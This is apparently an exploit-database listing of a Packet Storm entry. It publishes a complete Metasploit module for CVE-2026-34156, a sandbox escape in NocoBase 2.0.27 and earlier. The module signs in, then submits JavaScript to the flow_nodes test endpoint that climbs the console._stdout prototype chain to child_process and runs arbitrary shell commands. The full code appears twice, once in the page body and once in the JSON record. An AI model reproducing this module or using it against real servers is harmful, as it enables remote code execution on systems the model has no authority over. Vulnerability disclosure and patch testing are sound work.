📄 NocoBase 2.0.27 Sandbox Escape / Remote Code Execution

9.9 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Description

This code is a Metasploit Auxiliary module designed to exploit a remote code execution vulnerability in NocoBase versions 2.0.27 and below. It targets a flaw in the server-side script execution engine flownodes that allows breaking out of the...

Visit Original Source

Basic Information

ID PACKETSTORM:219776

Published Apr 24, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : NocoBase 2.0.27 Sandbox Escape RCE Metasploit Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.nocobase.com |
==================================================================================================================================

[+] Summary : This code is a Metasploit Auxiliary module designed to exploit a Remote Code Execution (RCE) vulnerability in NocoBase (<= 2.0.27).
It targets a flaw in the server-side script execution engine (flow_nodes) that allows breaking out of the JavaScript sandbox.

[+] POC :

##
# CVE-2026-34156 - NocoBase RCE
# Sandbox escape via console._stdout prototype chain
##

require 'msf/core'
require 'json'
require 'uri'
require 'net/http'

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'NocoBase RCE via Sandbox Escape',
'Description' => %q{
This module exploits a sandbox escape in NocoBase (<= 2.0.27)
via prototype chain manipulation leading to RCE.
},
'Author' => ['Indoushka'],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2026-34156']
]
))

register_options([
Opt::RHOST(),
Opt::RPORT(80),
OptString.new('TARGETURI', [true, 'Base path', '/']),
OptString.new('USERNAME', [true, 'Username', '[email protected]']),
OptString.new('PASSWORD', [true, 'Password', 'admin123']),
OptString.new('CMD', [false, 'Command to execute', 'id'])
])
end

def build_payload(cmd)
safe_cmd = cmd.gsub("'", "\\\\'")

<<~JS.strip
const Fn=console._stdout.constructor.constructor;
const proc=Fn('return process')();
const cp=proc.mainModule.require('child_process');
return cp.execSync('#{safe_cmd}',{shell:'/bin/sh'}).toString().trim();
JS
end

def login
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/api/auth:signIn'),
'ctype' => 'application/json',
'data' => {
'account' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}.to_json
})

if res && res.code == 200
json = res.get_json_document
if json && json['data'] && json['data']['token']
return json['data']['token']
end
end

nil
end

def exec_cmd(token, cmd)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/api/flow_nodes:test'),
'ctype' => 'application/json',
'headers' => {
'Authorization' => "Bearer #{token}"
},
'data' => {
'type' => 'script',
'config' => {
'content' => build_payload(cmd),
'timeout' => 5000,
'arguments' => []
}
}.to_json
})

return nil unless res

begin
json = res.get_json_document
return json['data']['result'] if json && json['data']
rescue
return res.body
end

nil
end

def run
print_status("Starting NocoBase RCE exploit...")

token = login

if token.nil?
print_error("Login failed")
return
end

print_good("Authenticated successfully")

cmd = datastore['CMD']

print_status("Executing: #{cmd}")

result = exec_cmd(token, cmd)

if result
print_good("Output:\n#{result}")
else
print_error("No output received")
end
end
end

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-04-24T20:44:52",
    "description": "This code is a Metasploit Auxiliary module designed to exploit a remote code execution vulnerability in NocoBase versions 2.0.27 and below. It targets a flaw in the server-side script execution engine flownodes that allows breaking out of the...",
    "published": "2026-04-24T00:00:00",
    "modified": "2026-04-24T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 NocoBase 2.0.27 Sandbox Escape / Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219776",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-34156"
    ],
    "sourceData": "==================================================================================================================================\n    | # Title     : NocoBase 2.0.27 Sandbox Escape RCE Metasploit Module                                                             |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://www.nocobase.com                                                                                         |\n    ==================================================================================================================================\n    \n    [+] Summary    : This code is a Metasploit Auxiliary module designed to exploit a Remote Code Execution (RCE) vulnerability in NocoBase (<= 2.0.27).\n                     It targets a flaw in the server-side script execution engine (flow_nodes) that allows breaking out of the JavaScript sandbox.\n    \n    [+] POC        :  \n    \n    ##\n    # CVE-2026-34156 - NocoBase RCE\n    # Sandbox escape via console._stdout prototype chain\n    ##\n    \n    require 'msf/core'\n    require 'json'\n    require 'uri'\n    require 'net/http'\n    \n    class MetasploitModule < Msf::Auxiliary\n      include Msf::Exploit::Remote::HttpClient\n    \n      def initialize(info = {})\n        super(update_info(info,\n          'Name'        => 'NocoBase RCE via Sandbox Escape',\n          'Description' => %q{\n            This module exploits a sandbox escape in NocoBase (<= 2.0.27)\n            via prototype chain manipulation leading to RCE.\n          },\n          'Author'      => ['Indoushka'],\n          'License'     => MSF_LICENSE,\n          'References'  => [\n            ['CVE', '2026-34156']\n          ]\n        ))\n    \n        register_options([\n          Opt::RHOST(),\n          Opt::RPORT(80),\n          OptString.new('TARGETURI', [true, 'Base path', '/']),\n          OptString.new('USERNAME', [true, 'Username', '[email protected]']),\n          OptString.new('PASSWORD', [true, 'Password', 'admin123']),\n          OptString.new('CMD', [false, 'Command to execute', 'id'])\n        ])\n      end\n    \n      def build_payload(cmd)\n        safe_cmd = cmd.gsub(\"'\", \"\\\\\\\\'\")\n    \n        <<~JS.strip\n          const Fn=console._stdout.constructor.constructor;\n          const proc=Fn('return process')();\n          const cp=proc.mainModule.require('child_process');\n          return cp.execSync('#{safe_cmd}',{shell:'/bin/sh'}).toString().trim();\n        JS\n      end\n    \n      def login\n        res = send_request_cgi({\n          'method' => 'POST',\n          'uri'    => normalize_uri(target_uri.path, '/api/auth:signIn'),\n          'ctype'  => 'application/json',\n          'data'   => {\n            'account'  => datastore['USERNAME'],\n            'password' => datastore['PASSWORD']\n          }.to_json\n        })\n    \n        if res && res.code == 200\n          json = res.get_json_document\n          if json && json['data'] && json['data']['token']\n            return json['data']['token']\n          end\n        end\n    \n        nil\n      end\n    \n      def exec_cmd(token, cmd)\n        res = send_request_cgi({\n          'method' => 'POST',\n          'uri'    => normalize_uri(target_uri.path, '/api/flow_nodes:test'),\n          'ctype'  => 'application/json',\n          'headers' => {\n            'Authorization' => \"Bearer #{token}\"\n          },\n          'data' => {\n            'type' => 'script',\n            'config' => {\n              'content' => build_payload(cmd),\n              'timeout' => 5000,\n              'arguments' => []\n            }\n          }.to_json\n        })\n    \n        return nil unless res\n    \n        begin\n          json = res.get_json_document\n          return json['data']['result'] if json && json['data']\n        rescue\n          return res.body\n        end\n    \n        nil\n      end\n    \n      def run\n        print_status(\"Starting NocoBase RCE exploit...\")\n    \n        token = login\n    \n        if token.nil?\n          print_error(\"Login failed\")\n          return\n        end\n    \n        print_good(\"Authenticated successfully\")\n    \n        cmd = datastore['CMD']\n    \n        print_status(\"Executing: #{cmd}\")\n    \n        result = exec_cmd(token, cmd)\n    \n        if result\n          print_good(\"Output:\\n#{result}\")\n        else\n          print_error(\"No output received\")\n        end\n      end\n    end\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/219776",
    "cvss": {
        "score": 9.9,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219776/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 NocoBase 2.0.27 Sandbox Escape / Remote Code Execution_PACKETSTORM:219776

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply